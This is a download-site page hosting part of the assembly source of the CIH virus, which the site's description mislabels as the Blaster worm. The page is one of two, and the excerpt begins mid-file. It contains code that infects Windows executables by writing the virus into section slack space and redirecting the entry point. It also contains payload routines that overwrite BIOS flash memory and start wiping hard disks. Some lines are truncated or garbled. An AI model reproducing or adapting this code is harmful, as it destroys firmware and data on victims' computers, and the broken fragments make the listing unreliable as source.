⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 cihxxxxx.txt

📁 这是冲击波病毒的源码及其详解,可以通过它了解病毒的基本原理.
💻 TXT
📖 第 1 页 / 共 2 页
字号:
; ************************************* 
; * Stack Dump : * 
; * * 
; * ESP => ------------------------- * 
; * | EFLAG(CF=0) | * 
; * ------------------------- * 
; * | FileNameBufferPointer | * 
; * ------------------------- * 
; * | EDI | * 
; * ------------------------- * 
; * | ESI | * 
; * ------------------------- * 
; * | EBP | * 
; * ------------------------- * 
; * | ESP | * 
; * ------------------------- * 
; * | EBX | * 
; * ------------------------- * 
; * | EDX | * 
; * ------------------------- * 
; * | ECX | * 
; * ------------------------- * 
; * | EAX | * 
; * ------------------------- * 
; * | Return Address | * 
; * ------------------------- * 
; ************************************* 

push ebx ; Save File Handle 

push 00h ; Set VirusCodeSectionTableEndMark 

; *************************** 
; * Let's Set the * 
; * Virus' Infected Mark * 
; *************************** 

push 01h ; Size 
push edx ; Pointer of File 
push edi ; Address of Buffer 

; *************************** 
; * Save ESP Register * 
; *************************** 

mov dr1, esp 

; *************************** 
; * Let's Set the * 
; * NewAddressOfEntryPoint * 
; * ( Only First Set Size ) * 
; *************************** 

push eax ; Size 

; *************************** 
; * Let's Read * 
; * Image Header in File * 
; *************************** 

mov eax, ebp 
mov cl, SizeOfImageHeaderToRead 
add edx, 07h ; Move EDX to NumberOfSections 
call edi ; VXDCall IFSMgr_Ring0_FileIO 

; *************************** 
; * Let's Set the * 
; * NewAddressOfEntryPoint * 
; * ( Set Pointer of File, * 
; * Address of Buffer ) * 
; *************************** 

lea eax, (AddressOfEntryPoint-@8)[edx] 
push eax ; Pointer of File 

lea eax, (NewAddressOfEntryPoint-@8)[esi] 
push eax ; Address of Buffer 

; *************************** 
; * Move EDX to the Start * 
; * of SectionTable in File * 
; *************************** 

movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] 
lea edx, [eax+edx+12h] 

; *************************** 
; * Let's Get * 
; * Total Size of Sections * 
; *************************** 

mov al, SizeOfScetionTable 

; I Assume NumberOfSections <= 0ffh 
mov cl, (NumberOfSections-@8)[esi] 
; * Address of Entry Point * 
; *************************** 

; Save My Virus First Section Code 
; Size of Following Section Table... 
; ( Not Include the Size of Virus Code Section Table ) 
push ecx 

xchg ecx, eax ; ECX = Size of Section Table 

mov eax, (AddressOfEntryPoint-@9)[esi] 
add eax, (ImageBase-@9)[esi] 
mov (OriginalAddressOfEntryPoint-@9)[esi], eax 

; *************************** 
; * Read All Section Tables * 
; *************************** 

mov eax, ebp 
call edi ; VXDCall IFSMgr_Ring0_FileIO 

; *************************** 
; * Let's Set Total Virus * 
; * Code Section Table * 
; *************************** 

; EBX = My Virus First Section Code 
; Size of Following Section Table 
pop ebx 
pop edi ; EDI = TotalSizeOfVirusCodeSectionTabl 
pop ecx ; ECX = NumberOfSections+1 

push edi ; Size 

add edx, eax 
push edx ; Pointer of File 

add eax, esi 
push eax ; Address of Buffer 

; *************************** 
; * Set the First Virus * 
; * Code Section Size in * 
; * VirusCodeSectionTable * 
; *************************** 

lea eax, [eax+edi-04h] 
mov [eax], ebx 

; *************************** 
; * Let's Set My Virus * 
; * First Section Code * 
; *************************** 

push ebx ; Size 

add edx, edi 
push edx ; Pointer of File 

lea edi, (MyVirusStart-@9)[esi] 
push edi ; Address of Buffer 

; *************************** 
; * Let's Modify the * 
; * AddressOfEntryPoint to * 
; * My Virus Entry Point * 
; *************************** 

mov (NewAddressOfEntryPoint-@9)[esi], edx 

; *************************** 
; * Setup Initial Data * 
; *************************** 

lea edx, [esi-SizeOfScetionTable] 
mov ebp, offset VirusSize 

jmp StartToWriteCodeToSections 

; *************************** 
; * Write Code to Sections * 
; *************************** 

LoopOfWriteCodeToSections: 

add edx, SizeOfScetionTable 

mov ebx, (SizeOfRawData-@9)[edx] 
sub ebx, (VirtualSize-@9)[edx] 
jbe EndOfWriteCodeToSections 

push ebx ; Size 

sub eax, 08h 
mov [eax], ebx 

mov ebx, (PointerToRawData-@9)[edx] 
add ebx, (VirtualSize-@9)[edx] 
push ebx ; Pointer of File 

push edi ; Address of Buffer 

mov ebx, (VirtualSize-@9)[edx] 
add ebx, (VirtualAddress-@9)[edx] 
add ebx, (ImageBase-@9)[esi] 
mov [eax+4], ebx 

mov ebx, [eax] 
add (VirtualSize-@9)[edx], ebx 

; Section contains initialized data ==> 00000040h 
; Section can be Read. ==> 40000000h 
or (Characteristics-@9)[edx], 40000040h 

StartToWriteCodeToSections: 

sub ebp, ebx 
jbe SetVirusCodeSectionTableEndMark 

add edi, ebx ; Move Address of Buffer 

EndOfWriteCodeToSections: 

loop LoopOfWriteCodeToSections 

; *************************** 
; * Only Set Infected Mark * 
; *************************** 

OnlySetInfectedMark: 
mov esp, dr1 

jmp WriteVirusCodeToFile 

; *************************** 
; * Set Virus Code * 
; * Section Table End Mark * 
; *************************** 

SetVirusCodeSectionTableEndMark: 

; Adjust Size of Virus Section Code to Correct Value 
add [eax], ebp 
add [esp+08h], ebp 

; Set End Mark 
xor ebx, ebx 
mov [eax-04h], ebx 

; *************************** 
; * When VirusGame Calls * 
; * VxDCall, VMM Modifies * 
; * the 'int 20h' and the * 
; * 'Service Identifier' * 
; * to 'Call [XXXXXXXX]'. * 
; *************************** 
; * Before Writing My Virus * 
; * to File, I Must Restore * 
; * them First. ^__^ * 
; *************************** 

lea eax, (LastVxDCallAddress-2-@9)[esi] 

mov cl, VxDCallTableSize 

LoopOfRestoreVxDCallID: 
mov word ptr [eax], 20cdh 

mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] 
mov [eax+2], edx 

movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[es 

sub eax, edx 

loop LoopOfRestoreVxDCallID 

; *************************** 
; * Let's Write * 
; * Virus Code to the File * 
; *************************** 

WriteVirusCodeTofile: 
mov eax, dr1 
mov ebx, [eax+10h] 
mov edi, [eax] 

LoopOfWriteVirusCodeTofile: 

pop ecx 
jecxz SetFileModificationMark 

mov esi, ecx 
mov eax, 0d601h 
pop edx 
pop ecx 

call edi ; VXDCall IFSMgr_Ring0_FileIO 

jmp LoopOfWriteVirusCodeToFile 

; *************************** 
; * Let's Set CF = 1 ==> * 
; * Need to Restore File * 
; * Modification Time * 
; *************************** 

SetFileModificationMark: 
pop ebx 
pop eax 

stc ; Enable CF(Carry Flag) 
pushf 

; ************************************* 
; * Close File * 
; ************************************* 

Closefile: 
xor eax, eax 
mov ah, 0d7h 
call edi ; VXDCall IFSMgr_Ring0_FileIO 

; ************************************* 
; * Need to Restore File Modification * 
; * Time !? * 
; ************************************* 

popf 
pop esi 
jnc IsKillComputer 

; ************************************* 
; * Restore File Modification Time * 
; ************************************* 

mov ebx, edi 

mov ax, 4303h 
mov ecx, (FileModificationTime-@7)[esi] 
mov edi, (FileModificationTime+2-@7)[esi] 
call ebx ; VXDCall IFSMgr_Ring0_FileIO 

; ************************************* 
; * Disable OnBusy * 
; ************************************* 

DisableOnBusy: 
dec byte ptr (OnBusy-@7)[esi] ; Disable OnBus 

; ************************************* 
; * Call Previous FileSystemApiHook * 
; ************************************* 

prevhook: 
popad 

mov eax, dr0 ; 
jmp [eax] ; Jump to prevhook 

; ************************************* 
; * Call the Function that the IFS * 
; * Manager Would Normally Call to * 
; * Implement this Particular I/O * 
; * Request. * 
; ************************************* 

pIFSFunc: 
mov ebx, esp 
push dword ptr [ebx+20h+04h+14h] ; Push pioreq 
call [ebx+20h+04h] ; Call pIFSFunc 
pop ecx ; 

mov [ebx+1ch], eax ; Modify EAX Value in Stack 

; *************************** 
; * After Calling pIFSFunc, * 
; * Get Some Data from the * 
; * Returned pioreq. * 
; *************************** 

cmp dword ptr [ebx+20h+04h+04h], 00000024h 
jne QuitMyVirusFileSystemHook 

; ***************** 
; * Get the File * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; ************************************** 

; *************************** 
; * Kill BIOS EEPROM * 
; *************************** 

mov bp, 0cf8h 
lea esi, IOForEEPROM-@7[esi] 

; *********************** 
; * Show BIOS Page in * 
; * 000E0000 - 000EFFFF * 
; * ( 64 KB ) * 
; *********************** 

mov edi, 8000384ch 
mov dx, 0cfeh 
cli 
call esi 

; *********************** 
; * Show BIOS Page in * 
; * 000F0000 - 000FFFFF * 
; * ( 64 KB ) * 
; *********************** 

mov di, 0058h 
dec edx ; and a 
0fh 
mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h 
call esi 

; *********************** 
; * Show the BIOS Extra * 
; * ROM Data in Memory * 
; * 000E0000 - 000E01FF * 
; * ( 512 Bytes ) * 
; * , and the Section * 
; * of Extra BIOS can * 
; * be Writted... * 
; *********************** 

lea ebx, EnableEEPROMToWrite-@10[esi] 

mov eax, 0e5555h 
mov ecx, 0e2aaah 
call ebx 
mov byte ptr [eax], 60h 

push ecx 
loop $ 

; *********************** 
; * Kill the BIOS Extra * 
; * ROM Data in Memory * 
; * 000E0000 - 000E007F * 
; * ( 80h Bytes ) * 
; *********************** 

xor ah, ah 
mov [eax], al 

xchg ecx, eax 
loop $ 

; *********************** 
; * Show and Enable the * 
; * BIOS Main ROM Data * 
; * 000E0000 - 000FFFFF * 
; * ( 128 KB ) * 
; * can be Writted... * 
; *********************** 

mov eax, 0f5555h 
pop ecx 
mov ch, 0aah 
call ebx 
mov byte ptr [eax], 20h 

loop $ 

; *********************** 
; * Kill the BIOS Main * 
; * ROM Data in Memory * 
; * 000FE000 - 000FE07F * 
; * ( 80h Bytes ) * 
; *********************** 

mov ah, 0e0h 
mov [eax], al 

; *********************** 
; * Hide BIOS Page in * 
; * 000F0000 - 000FFFFF * 
; * ( 64 KB ) * 
; *********************** 
; or al 
0h 
mov word ptr (BooleanCalculateCode-@10)[esi], 100ch 
call esi 

; *************************** 
; * Kill All HardDisk * 
; *************************************************** 
; * IOR Structure of IOS_SendCommand Needs * 
; *************************************************** 
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? * 
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 * 
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * 
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * 
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? * 
; *************************************************** 

KillHardDisk: 
xor ebx, ebx 
mov bh, FirstKillHardDiskNumber 
push ebx 
sub esp, 2ch 
push 0c0001000h 
; *************************** 
; * IO for EEPROM * 
; *************************** 

IOForEEPROM: 
@10 = IOForEEPROM 

xchg eax, edi 
xchg edx, ebp 
out dx, eax 

xchg eax, edi 
xchg edx, ebp 
in al, dx 

BooleanCalculateCode = $ 
or al, 44h 

xchg eax, edi 
xchg edx, ebp 
out dx, eax 

xchg eax, edi 
xchg edx, ebp 
out dx, al 

ret 

; ********************************************************* 
; * Static Data * 
; ********************************************************* 

LastVxDCallAddress = IFSMgr_Ring0_FileIO 
VxDCallAddressTable db 00h 
db IFSMgr_RemoveFileSystemApiHook-_PageAllocate 
db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook 
db IFSMgr_Ring0_FileIO-UniToBCSPath 

VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h 
VxDCallTableSize = ($-VxDCallIDTable)/04h 

; ********************************************************* 
; * Virus Version Copyright * 
; ********************************************************* 

VirusVersionCopyright db 'CIH v' 
db MajorVirusVersion+'0' 
db '.' 
db MinorVirusVersion+'0' 
db ' TTIT' 

; ********************************************************* 
; * Virus Size * 
; ********************************************************* 

VirusSize = $ 
; + SizeOfVirusCodeSectionTableEndMark(04h) 
; + NumberOfSections(??)*SizeOfVirusCodeSectionTa 
e(08h) 
; + SizeOfTheFirstVirusCodeSectionTable(04h) 

; ********************************************************* 
; * Dynamic Data * 
; ********************************************************* 

VirusGameDataStartAddress = VirusSize 
PointerToRelocations = StartOfSectionTable+18h ; DWORD 
PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD 
NumberOfRelocations = StartOfSectionTable+20h ; WORD 
NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD 
Characteristics = StartOfSectionTable+24h ; DWORD 
SizeOfScetionTable = Characteristics+04h-SectionName 

; ********************************************************* 
; * Virus Total Need Memory * 
; ********************************************************* 

VirusNeedBaseMemory = $ 

VirusTotalNeedMemory = @9 
; + NumberOfSections(??)*SizeOfScetionTable(28h) 
; + SizeOfVirusCodeSectionTableEndMark(04h) 
; + NumberOfSections(??)*SizeOfVirusCodeSectionTa 
e(08h) 
; + SizeOfTheFirstVirusCodeSectionTable(04h) 

; ********************************************************* 
; ********************************************************* 

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -